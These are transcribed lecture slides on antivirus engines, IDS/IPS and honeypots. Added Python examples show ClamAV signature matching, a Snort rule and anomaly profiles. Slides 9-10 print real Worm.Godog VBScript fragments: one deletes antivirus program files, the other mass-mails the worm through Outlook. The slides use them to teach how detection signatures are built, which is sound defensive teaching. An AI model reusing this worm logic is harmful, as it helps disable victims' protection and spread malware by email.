Antivirus, IDS/IPS, Honeypot PDF
Vilnius Tech
2024
Dr. Donatas Vitkus
Summary
This presentation covers antivirus software, intrusion detection and prevention systems (IDS/IPS), and honeypots. It details definitions, types, actions, detection techniques, and signature methods. The presentation, prepared for the autumn of the 2023-2024 academic year, targets computer science or cybersecurity students.
Full Transcript
Slide 1: Antivirus, IDS/IPS, Honeypot
Dr. Donatas Vitkus
Vilnius Tech, FMF, ISK
2023-2024 academic year, autumn

Slide 2: Definitions
False-positive
False-negative

Slide 3: Antiviruses
An antivirus identifies, neutralizes, or eliminates malware. At the beginning of the twentieth century antiviruses were used only for protection against computer viruses; current antiviruses protect against many kinds of malware.
Virus scanner: the malware search mechanism.
Antiviruses, firewalls and IDS can duplicate each other.
Commercial aspect.

Slide 4: Types of antiviruses (classification based on functionality)
Scanners: signature + heuristics.
Revisionists: capture the state of the file system.
Monitors: monitor potentially dangerous actions.
Vaccinators: make the virus think that the file is already infected.

Slide 5: Actions
Remove an infected file.
Block access to an infected file.
Quarantine (blocking of execution).
Removal of the virus from the body of the file (treatment).
Performing one of the above actions after moving.

Slide 6: Malware detection techniques
Signature-based method
Heuristic method
Anomaly analysis
"Sandbox"
"Whitelist" method
Multi-core / combined

Slide 7: Signature method
The basis is the unique lines of malware code, which removes false positives. Signatures are created manually.
Advantages: accuracy, reliability, the most widely used and well-established technology.
Disadvantages: does not see new or polymorphic malware; delay in updates; growth of the signature base slows down scanning; a lot of manual work on creating signatures.

Slide 8: Signature formats (2)
ClamAV (only for .ndb-type signatures stored in .ldb files):

```text
SignatureName;TargetDescriptionBlock;LogicalExpression;Subsig0;Subsig1;Subsig2;...
```
Slide 9: For example: Worm.Godog (1)
About: mass-mailer, AV killer, VB-script.

```vbscript
Registro = legion.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If FileExists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\Avp32.exe") then
path = Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro"
legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\*.*")
If fileexists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\Avp32.exe") then
path = Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal"
legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\*.*")
if FileExists(Registro & "\Antiviral Toolkit Pro\avp32.exe") then
path = Registros & "\Antiviral Toolkit Pro"
legions.DeleteFile (Registro & "\Antiviral Toolkit Pro\*.*")
if fileexists (Registro & "\AVPersonal\Avguard.exe") then
path = Registro & "\AVPersonal"
legions.DeleteFile (Registro & "\AVPersonal\*.*")
if fileexists (Registro & "\Trend PC-cillin 98\IOMON98.EXE") then
path = Registro & "\Trend PC-cillin 98"
legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.*")
legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.EXE")
legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.dll")
```

Slide 10: For example: Worm.Godog (2)

```vbscript
Set Create = CreateObject ("Scripting.FileSystemObject")
Set mail = Create.CreateTextFile("C:\mail.vbs")
mail.writeline "On Error Resume Next"
mail.writeline "Dim leg, Mail, Counter, A, B, C, D, E"
mail.writeline "Set leg = CreateObject" & Chr(32)& "(" & chr(34) & "Outlook.Application" & Chr(34) &")"
mail.writeline "Set C = CreateObject "& Chr(32) & "(" & chr(34) & "Scripting.FileSystemObject" & Chr(34)& ")"
mail.writeline "Set Mail = leg.GetNameSpace" & Chr(32) & "(" & chr(34)& "MAPI" & Chr(34)&")"
mail.writeline "For A = 1 To Mail.AddressLists.Count"
mail.writeline "Set B = Mail.AddressLists (A)"
mail.writeline "Counter = 1"
mail.writeline "Set C = leg.CreateItem (0)"
mail.writeline "For D = 1 To B.AddressEntries.Count"
mail.writeline "E = B.AddressEntries (Counter)"
mail.writeline "C.Recipients.Add E"
mail.writeline "Counter = Counter + 1"
mail.writeline "If Counter > 8000 Then Exit For"
mail.writeline "Next"
mail.writeline "C.Subject =" & Chr(32) & Chr(34) &"Legion Game" & Chr(34)
mail.writeline "C.Body = "& Chr(32) & Chr(34) & "YA jugaste el juego Legion? si no aqui te lo doy checalo y hay me dices que tal..." & Chr(34)
mail.writeline "C.Attachments.Add"& Chr(32) & Chr(34) & "C:\Legion.vbs" & Chr(34)
mail.writeline "C.DeleteAfterSubmit = True"
mail.writeline "C.Send"
mail.writeline "Next"
mail.Close
legion.Run ("C:\mail.vbs")
```

Slide 11: Example of creating a signature (1)

```text
Kaspersky Antivirus Personal / Kaspersky Antivirus Personal Pro (0):
66696c656578697374732028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c

Antiviral Toolkit Pro (1):
66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f

AVPersonal (2):
66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c
```

Slide 12: Example of creating a signature (2)

```text
Trend PC-cillin 98 (3):
66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e

Mailer loop (4):
666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64
```

Slide 13: Example of creating a signature (3)

```text
Worm.Godog;Target:0;((0|1|2|3)&(4));66696c656578697374732028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c;66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f;66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c;66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e;666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64
```

Slide 14: Heuristic method
Designed to detect malware when the signature does not match 100%.
Suitable for the detection of *morphic viruses, but not entirely reliable: false positives, no treatment option.
For example: monitoring actions that are used in a limited way (FDISK, partitioning); emulation of the functioning of the virus; decompilation and analysis of the percentage of coincidences.

Slide 15: Anomaly analysis
Monitors: processes, traffic, user actions.
For example: whether the process modifies .exe files.
Advantages: detects new malware, dynamic, adaptive.
Disadvantages: very unreliable, high false-positive rate, nobody reads the "Accept" button, some of the suspicious actions observed are performed by legitimate programs.
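As an added example (not part of the lecture), the following Python code parses the Worm.Godog logical signature from slides 11-13 in the ClamAV .ldb layout of slide 8, translates each hex subsignature with its {-n} wildcards into a regex, and evaluates the logical expression ((0|1|2|3)&(4)) over constructed lower-case text fragments. Only hex bytes and {-n} gaps are handled, and the caller is assumed to lower-case the scanned text, because the slide's hex is all lower case.

```python
import re

# Worm.Godog logical signature (.ldb line) as given on the slides; the five hex
# subsignatures are copied verbatim: (0)-(3) the AV-killer checks, (4) the mailer loop.
GODOG_LDB = ";".join([
    "Worm.Godog", "Target:0", "((0|1|2|3)&(4))",
    "66696c656578697374732028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c",
    "66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f",
    "66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c",
    "66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e",
    "666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64",
])

def subsig_to_regex(subsig: str) -> re.Pattern:
    """Hex byte pairs become literal bytes; the wildcard {-n} means 'n or fewer arbitrary
    bytes'. Only these two elements are handled, which covers the slide's example."""
    out = []
    for piece in re.split(r"(\{-\d+\})", subsig):
        gap = re.fullmatch(r"\{-(\d+)\}", piece)
        if piece:
            out.append(b".{0,%d}" % int(gap.group(1)) if gap else re.escape(bytes.fromhex(piece)))
    return re.compile(b"".join(out), re.DOTALL)

def parse_ldb(line: str):
    """Split SignatureName;TargetDescriptionBlock;LogicalExpression;Subsig0;Subsig1;..."""
    name, target, expr, *subsigs = line.strip().split(";")
    return name, target, expr, [subsig_to_regex(s) for s in subsigs]

def subsig_hits(line: str, data: bytes) -> list:
    """Per-subsignature result: does each pattern occur anywhere in the scanned data?"""
    return [p.search(data) is not None for p in parse_ldb(line)[3]]

def ldb_matches(line: str, data: bytes) -> bool:
    """Evaluate the logical expression over the hits. Indices, parentheses, | and & are
    supported; the expression is validated before it is evaluated as Python booleans."""
    expr = parse_ldb(line)[2]
    if not re.fullmatch(r"[\d()|&\s]+", expr):
        raise ValueError("unsupported logical expression: " + expr)
    hits = subsig_hits(line, data)
    py = re.sub(r"\d+", lambda m: str(hits[int(m.group())]), expr)
    return bool(eval(py, {"__builtins__": {}}, {}))

# Constructed lower-case fragments (not the worm itself). The slide's hex is lower case,
# so the caller is assumed to lower-case the scanned text before matching.
AV_KILLER_ONLY = b'if fileexists (p & "\\avpersonal\\avguard.exe") then fso.deletefile (p & "\\avpersonal\\*.*")'
MAILER_ONLY = (b"for d = 1 to b.addressentries.count\nc.recipients.add e\n"
               b"if counter > 8000 then exit for\nnext\nc.attachments.add f\nc.send")
```

Because the expression requires subsignature (4) as well as one of (0)-(3), a file that only deletes AV directories or only mass-mails does not match; both behaviours together do.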
Slide 16: "Sandbox"
The virtual machine on which the suspected malware is executed.
After the execution of the suspected malware, the changes made to the system are analyzed.
Advantages: efficiency, suitable for professional analysis.
Disadvantages: high consumption of computer resources and time.

Slide 17: "Whitelist"
Only applications on the whitelist are allowed.
Advantages: no need for signature renewal, effective, suitable for large corporations with a policy of using AE.
Disadvantages: not very flexible or user-friendly, requires the administrator's working time.

Slide 18: Intrusion detection
Importance
Problems

Slide 19: Assumptions
Intrusion detection methods are based on the assumption that the behavior of a hacker differs from that of legitimate users, and that this difference can be detected and captured.
But there is no strict line between legitimate user behavior and hacker behavior.
Therefore, an IDS only warns that hacking is possible.
The choice of the optimal interpretation of illegal activities is the main problem of any method of detecting intrusions.
Slide 20: Rules-based intrusion detection methods
For example, Snort:

```text
alert tcp $EXTERNAL_NET any -> $HOME_NET 4000 (msg:"EXPLOIT Alt-N SecurityGateway username buffer overflow attempt"; flow:established,to_server; content:"username="; nocase; isdataat:450,relative; content:!"&"; within:450; content:!"|0A|"; within:450; metadata:policy balanced-ips drop, policy connectivity-ips drop, policy security-ips drop; reference:url,secunia.com/advisories/30497/; classtype:attempted-admin; sid:13916; rev:2;)
```

Slide 21: Anomaly-based intrusion detection methods
Initial stage: collecting information about the typical behavior of legitimate users and resources.
The data collected is statistically processed and criteria are established that characterize the normal state: threshold criteria and profiles.
Profiles are set up for users, groups and resources. Examples of profile measures: number of events in a time interval, time interval, resource usage measure.

Slide 22: Methods +/-
Rules-based methods
Methods based on anomalies

Slide 23: IDS / IPS
Intrusion detection systems are software that implements intrusion detection techniques. The goal is to detect intrusions, potential security policy violation events, or threats of such violations. IDS are also used to record attack attempts and collect the data necessary to prepare security situation assessment reports.
Intrusion prevention systems perform all the same functions as IDS, but additionally use automated tools to stop possible attacks.
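As an added example (not from the lecture or the Snort project), this Python function reimplements the payload part of the sid:13916 rule from slide 20: `content:"username="` with `nocase`, `isdataat:450,relative`, and the two negated contents with `within:450`, and runs it over constructed request bodies. The header tests and `flow:established,to_server` are assumed to be done by the caller on the TCP stream; the function sees only the reassembled payload.

```python
import re

# Payload options of Snort sid:13916 as shown on the slide, expressed as constants.
CONTENT = b"username="            # content:"username="; nocase;
MIN_DATA_AFTER = 450              # isdataat:450,relative;
FORBIDDEN = (b"&", b"\x0a")       # content:!"&"; within:450;  content:!"|0A|"; within:450;
WITHIN = 450

def sid_13916_matches(payload: bytes) -> bool:
    """True when the payload has a `username=` field followed by at least 450 bytes that
    contain neither '&' nor a newline, i.e. one oversized form value. Each occurrence of
    the content is tried in turn, mirroring Snort's retry when a relative option fails."""
    for m in re.finditer(re.escape(CONTENT), payload, re.IGNORECASE):   # nocase
        cursor = m.end()                              # detection pointer after the match
        if len(payload) - cursor < MIN_DATA_AFTER:    # isdataat:450,relative not satisfied
            continue
        window = payload[cursor:cursor + WITHIN]      # within:450, relative to the cursor
        if all(bad not in window for bad in FORBIDDEN):   # both negated contents hold
            return True
    return False

def build_login(username: bytes) -> bytes:
    """Constructed request body in the shape the rule inspects (sample data, not from the slide)."""
    return (b"POST /login HTTP/1.1\r\nHost: gw.example\r\n\r\n"
            b"username=" + username + b"&password=secret")

if __name__ == "__main__":
    cases = [("normal login", build_login(b"alice")),
             ("500-byte username", build_login(b"A" * 500)),
             ("long but split by &", build_login(b"A" * 100 + b"&x=" + b"A" * 400))]
    for name, body in cases:
        print("%-22s -> %s" % (name, "ALERT" if sid_13916_matches(body) else "ok"))
```

The negated contents are what keep a long but well-formed form submission (many `&`-separated fields) from triggering the rule; only a single field of 450+ bytes does.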
IPS may try to stop attacks by: terminating the session; blocking access; changing the configuration of other security devices (firewall); modifying the transmitted information (removing files infected with malware).

Slide 24: IDS / IPS components
Sensors or agents
Management server
Database
[Dedicated secure management network]

Slide 25: NIDS (network-based)
Software/hardware.
Incapable of processing encrypted traffic.
Inefficient in the presence of large traffic volumes.
Attacks on sensors.
Example message:

```text
Sep 25 00:03:43 IDS snort: [1:8428:6] WEB-MISC SSLv2 openssl get shared ciphers overflow attempt [Classification: Attempted Administrator Privilege Gain] [Priority: 1]: {TCP} 78.59.190.213:16495 -> 192.168.1.3:443
```

Slide 26: HIDS / FIM (host-based)
Server / User / Service
Software solutions
Active / Passive agents
Realtime / Delayed

Slide 27: Honeypot / Honeynet
The honeypot idea
Low level of interactivity
High level of interactivity
Legal aspects of application

Slide 28: QUESTIONS
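As an added example for the anomaly-based method on slide 21 (learning stage, per-user profiles, threshold criteria on the number of events per time interval), here is Python code that builds per-user thresholds from constructed training events and then flags intervals that exceed them. The one-hour interval and the mean + 3 sigma criterion are assumptions, not taken from the slides.

```python
from collections import defaultdict
from statistics import mean, pstdev

INTERVAL = 3600  # profile granularity: events per one-hour interval (assumption)

def count_per_interval(events, interval=INTERVAL):
    """events: iterable of (user, unix_time). Returns {user: {bucket_index: count}}."""
    counts = defaultdict(lambda: defaultdict(int))
    for user, t in events:
        counts[user][t // interval] += 1
    return counts

def build_profiles(training_events, interval=INTERVAL, k=3.0):
    """Learning stage: per-user threshold = mean + k * stddev of events per interval.
    Intervals with no activity inside the training span count as zero."""
    counts = count_per_interval(training_events, interval)
    lo = min(t for _, t in training_events) // interval
    hi = max(t for _, t in training_events) // interval
    profiles = {}
    for user, buckets in counts.items():
        xs = [buckets.get(b, 0) for b in range(lo, hi + 1)]
        profiles[user] = mean(xs) + k * pstdev(xs)
    return profiles

def detect(profiles, events, interval=INTERVAL, unknown_threshold=0.0):
    """Detection stage: return (user, interval_start, count, threshold) for intervals
    above the profile. A user without a profile gets `unknown_threshold`, so any
    activity by an unknown user is reported."""
    alerts = []
    for user, buckets in count_per_interval(events, interval).items():
        thr = profiles.get(user, unknown_threshold)
        for b, n in sorted(buckets.items()):
            if n > thr:
                alerts.append((user, b * interval, n, round(thr, 2)))
    return alerts

def hourly(user, start, counts):
    """Constructed sample events: counts[i] events for `user` in hour i after `start`."""
    return [(user, start + i * INTERVAL + j * 60) for i, c in enumerate(counts) for j in range(c)]

TRAINING = hourly("alice", 0, [3, 2, 4, 3, 2, 3, 4, 3])       # one normal day of logins
OBSERVED = hourly("alice", 86400, [3, 12]) + [("mallory", 86400 + 100)]

if __name__ == "__main__":
    for a in detect(build_profiles(TRAINING), OBSERVED):
        print("ALERT user=%s interval_start=%d events=%d threshold=%.2f" % a)
```

The second hour of the observed day (12 logins against a threshold of about 5.1) and the unknown user are reported; the first hour, at 3 logins, is within profile.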